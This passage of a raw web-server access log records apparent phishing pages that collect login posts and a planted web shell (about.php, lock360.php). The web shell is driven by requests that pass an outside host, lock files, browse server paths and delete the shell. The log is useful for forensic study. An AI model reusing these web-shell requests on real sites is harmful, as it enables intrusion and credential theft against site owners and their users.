Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:05:43 -0400] "POST /wsssk.php HTTP/1.1" 200 3161 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:06:08 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 
OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:06:18 -0400] "POST /login.php HTTP/1.1" 200 314 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:06:20 -0400] "GET /login HTTP/1.1" 404 1251 "https://mgrokokbet.id/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:06:22 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:06:48 -0400] "POST /wsssk.php HTTP/1.1" 200 2765 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:06:52 -0400] "POST /wsssk.php HTTP/1.1" 200 2797 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:10:02 -0400] "POST /wsssk.php HTTP/1.1" 200 2796 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:10:07 -0400] "POST /wsssk.php HTTP/1.1" 200 3421 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:10:42 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:10:48 -0400] "POST /login.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/Rest.html" 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:13:19:48 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:19:49 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:19:50 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:19:51 -0400] "GET /internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:20:03 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:21:40 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:22:01 -0400] "POST /mywestnet.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:22:08 -0400] "GET /tm.html HTTP/1.1" 200 8917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:22:09 -0400] "GET 
/internet-product/broadband/nbn/ip-check HTTP/1.1" 404 1251 "https://mgrokokbet.id/tm.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:28:52 -0400] "POST /wsssk.php HTTP/1.1" 200 2248 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:28:56 -0400] "POST /wsssk.php HTTP/1.1" 200 3117 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:29:19 -0400] "POST /wsssk.php HTTP/1.1" 200 12902 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:29:46 -0400] "POST /wsssk.php HTTP/1.1" 200 3118 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:00 -0400] "POST /wsssk.php HTTP/1.1" 200 2476 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:07 -0400] "POST /wsssk.php HTTP/1.1" 200 3424 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:10 -0400] "POST /wsssk.php HTTP/1.1" 200 3116 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:36 -0400] "POST /wsssk.php HTTP/1.1" 200 2972 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:43 -0400] "POST /wsssk.php HTTP/1.1" 200 6428 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:47 -0400] "POST /wsssk.php HTTP/1.1" 200 2973 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:30:59 -0400] "POST /wsssk.php HTTP/1.1" 200 2505 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:31:04 -0400] "POST /wsssk.php HTTP/1.1" 200 3447 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:31:06 -0400] "POST /wsssk.php HTTP/1.1" 200 2969 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:31:18 -0400] "POST /wsssk.php HTTP/1.1" 200 3036 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:31:57 -0400] "POST /wsssk.php HTTP/1.1" 200 3091 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:32:27 -0400] "GET /640275/Rest.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:32:36 -0400] "GET /640275/Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:32:41 -0400] "POST /640275/login.php HTTP/1.1" 403 1242 "https://mgrokokbet.id/640275/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:47:22 -0400] "GET /640275/Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:13:48:17 -0400] "POST /640275/login.php HTTP/1.1" 403 1242 "https://mgrokokbet.id/640275/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 51.222.253.16 - - [23/Apr/2025:14:18:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 102.164.97.56 - - [23/Apr/2025:14:32:03 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:32:12 -0400] "POST /login.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:32:12 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:32:16 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 104.131.103.19 - - [23/Apr/2025:14:33:31 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 102.164.97.56 - - [23/Apr/2025:14:34:28 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:34:56 -0400] "GET /Rest HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; U; Android 13; itel A665L Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/135.0.7049.99 Mobile Safari/537.36 OPR/89.0.2254.76420" 102.164.97.56 - - [23/Apr/2025:14:34:57 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/Rest" "Mozilla/5.0 (Linux; U; Android 13; itel A665L Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/135.0.7049.99 Mobile Safari/537.36 OPR/89.0.2254.76420" 102.164.97.56 - - [23/Apr/2025:14:36:03 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Linux; U; Android 13; itel A665L Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/135.0.7049.99 Mobile Safari/537.36 OPR/89.0.2254.76420" 102.212.137.139 - - [23/Apr/2025:14:40:12 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36" 66.249.93.173 - - [23/Apr/2025:14:40:29 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G930V Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" 102.212.137.139 - - [23/Apr/2025:14:42:57 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36" 102.212.137.139 - - [23/Apr/2025:14:43:15 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/135.0.0.0 Mobile Safari/537.36" 149.154.161.253 - - [23/Apr/2025:14:49:09 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "TelegramBot (like TwitterBot)" 102.164.97.56 - - [23/Apr/2025:14:54:57 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:55:22 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:55:34 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:55:41 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:55:55 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.56 - - [23/Apr/2025:14:56:22 -0400] "POST /login.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.14 - - [23/Apr/2025:14:57:01 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.14 - - [23/Apr/2025:14:57:27 -0400] "POST /login.php HTTP/1.1" 404 1251 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.14 - - [23/Apr/2025:14:57:51 -0400] "GET /Rest.html 
HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 191.102.155.26 - - [23/Apr/2025:15:17:07 -0400] "GET / HTTP/1.1" 200 0 "-" "Apache-HttpClient/5.1.4 (Java/11.0.18)" 54.164.157.105 - - [23/Apr/2025:15:21:47 -0400] "GET / HTTP/1.1" 200 0 "-" "okhttp/4.9.2" 54.164.157.105 - - [23/Apr/2025:15:21:48 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "-" "okhttp/4.9.2" 54.164.157.105 - - [23/Apr/2025:15:21:48 -0400] "GET /favicon.png HTTP/1.1" 404 1251 "-" "okhttp/4.9.2" 108.136.206.220 - - [23/Apr/2025:19:55:37 -0400] "GET /admin/assets/tinymce/filemanager/dialog.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1" 104.236.240.17 - - [23/Apr/2025:20:00:56 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 138.68.172.160 - - [23/Apr/2025:20:02:30 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)" 147.182.249.61 - - [23/Apr/2025:20:05:50 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" 209.97.164.113 - - [23/Apr/2025:20:16:51 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 165.232.158.42 - - [23/Apr/2025:20:23:08 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" 63.141.227.138 - - [23/Apr/2025:20:30:01 -0400] "GET /640275/about.php?520&d_time HTTP/1.1" 200 38 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 51.222.253.7 - - [23/Apr/2025:20:47:07 -0400] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 51.222.253.14 - - [23/Apr/2025:20:47:08 -0400] "GET /640275/ HTTP/1.1" 404 0 "-" 
"Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 199.168.98.202 - - [23/Apr/2025:20:58:35 -0400] "GET /640275/about.php?520 HTTP/1.1" 200 109 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:36 -0400] "GET /640275/about.php?520 HTTP/1.1" 200 109 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:36 -0400] "POST /640275/about.php?520 HTTP/1.1" 200 1904 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:37 -0400] "POST /640275/about.php?520 HTTP/1.1" 200 1941 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:37 -0400] "GET /640275/lock360.php?ac=p&api=&path=&t=650adf113939f450c764fa0c091b7f06 HTTP/1.1" 200 36 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:38 -0400] "GET /index.php?params HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:38 -0400] "GET /640275/lock360.php?ac=u-about&api=&path=&t=650adf113939f450c764fa0c091b7f06 HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:39 -0400] "GET /640275/lock360.php?ac=i_old&api=http://6146-ch4-v288.img7yahoo.com&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 21 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - 
[23/Apr/2025:20:58:40 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:41 -0400] "GET /about.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html; (greenwich&lewisham))" 199.168.98.202 - - [23/Apr/2025:20:58:41 -0400] "GET /index.php HTTP/1.1" 200 229784 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html; (greenwich&lewisham))" 199.168.98.202 - - [23/Apr/2025:20:58:43 -0400] "GET /?page-test-.shtml HTTP/1.1" 200 232791 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html; (greenwich&lewisham))" 199.168.98.202 - - [23/Apr/2025:20:58:45 -0400] "GET /?page-test-.shtml HTTP/1.1" 200 0 "https://www.yahoo.co.jp/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:47 -0400] "GET /?params HTTP/1.1" 200 297 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 199.168.98.202 - - [23/Apr/2025:20:58:47 -0400] "GET /640275/lock360.php?ac=access_lock&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 6 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:49 -0400] "GET /640275/lock360.php?ac=memory_lock&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:52 -0400] "GET /640275/lock360.php?ac=check_lock_status&api=&path=/home/megavujh/mgrokokbet.id/index.php&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:55 -0400] "GET /640275/lock360.php?ac=cl&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06 HTTP/1.1" 200 1388 "https://mgrokokbet.id/640275/lock360.php?ac=cl&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:56 -0400] "GET /640275/lock360.php?ac=all_h&api=&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:20:58:57 -0400] "GET /640275/lock360.php?ac=delete_myself&api=&path=&t=650adf113939f450c764fa0c091b7f06 HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 198.204.240.42 - - [23/Apr/2025:21:26:47 -0400] "GET / HTTP/1.1" 200 2273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36" 198.204.240.42 - - [23/Apr/2025:21:26:48 -0400] "GET / HTTP/1.1" 200 2273 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 52.167.144.17 - - [23/Apr/2025:21:26:56 -0400] "GET /info.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:40:29 -0400] "GET /about.php?520 HTTP/1.1" 404 1251 "-" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:40:29 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/about.php?520" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:40:40 -0400] "GET /640275/about.php?520 HTTP/1.1" 200 60 "-" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:40:53 -0400] "POST /640275/about.php?520 HTTP/1.1" 200 892 "https://mgrokokbet.id/640275/about.php?520" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:40:57 -0400] "GET /640275/about.php?p=%E0%A6%95home%E0%A6%95megavujh%E0%A6%95mgrokokbet.id HTTP/1.1" 200 1447 "https://mgrokokbet.id/640275/about.php?520" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) 